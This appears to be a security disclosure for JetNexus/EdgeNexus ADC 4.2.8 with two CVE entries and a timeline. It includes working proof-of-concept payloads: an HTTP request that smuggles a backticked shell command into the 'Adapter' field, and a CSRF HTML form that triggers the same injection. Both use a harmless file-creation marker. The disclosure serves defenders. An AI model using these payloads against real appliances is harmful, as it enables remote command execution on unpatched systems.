JetNexus/EdgeNexus 4.2.8 Vulnerability Disclosure


Proof of Concept:

Command Injection (CVE-2022-37718):

POST /POST/23?iAction=4&iType=1 HTTP/1.1
Host: EDGENEXUS-HOST
Cookie: GUID=e8bf4ecfb2f747429088ade52b1a9afe
Accept: */*
Accept-Language: en-CA,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: text/plain
Content-Length: 109
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

{"CaptureHidden":"","Adapter":"eth0`touch /tmp/pwn`","Packets":"1","Duration":"1","CaptureAddress":"1.1.1.1"}

Cross-Site Request Forgery (CVE-2022-37719):

<!-- Cross-Site Request Forgery payload, triggering command injection -->
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://EDGENEXUS-HOST/POST/23?iAction=4&iType=1" method="POST" enctype="text/plain">
      <input type="hidden" name="&#123;&quot;CaptureHidden&quot;&#58;&quot;&quot;&#44;&quot;Adapter&quot;&#58;&quot;eth0&#96;touch&#32;&#47;tmp&#47;pwn1&#96;&quot;&#44;&quot;Packets&quot;&#58;&quot;1&quot;&#44;&quot;Duration&quot;&#58;&quot;1&quot;&#44;&quot;CaptureAddress&quot;&#58;&quot;1&#46;1&#46;1&#46;1&quot;&#125;" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


Mitre Reference:


CVE-2022-37718

Vulnerability Type: Command Injection
Affected Product Code Base: JetNexus/EdgeNexus ADC - 4.2.8
Affected Component: JetNexus/EdgeNexus management portal
Description: The network management component of JetNexus/EdgeNexus v4.2.8 was discovered to contain a command injection vulnerability. This vulnerability allows authenticated attackers to execute arbitrary commands.
Attack Vectors: Remote authenticated attacker can run arbitrary shell commands by sending a specially crafted request to JetNexus troubleshooting tools.
Attack Type: Remote
Impact Code execution: true
Impact Escalation of Privileges: true
Impact Information Disclosure: true

CVE-2022-37719

Vulnerability Type: Cross-Site Request Forgery (CSRF)
Affected Product Code Base: JetNexus/EdgeNexus ADC - 4.2.8
Affected Component: JetNexus/EdgeNexus management portal
Description: A Cross-Site Request Forgery (CSRF) in the management portal of JetNexus/EdgeNexus v4.2.8 allows attackers to escalate privileges and execute arbitrary code via unspecified vectors.
Attack Vectors: An authenticated user must click on a malicious link which hosts the CSRF payload.
CVE Impact Other: Impersonation
Attack Type: Remote
Impact Escalation of Privileges: true


Timeline:


09/14/22 - initial contact disclosure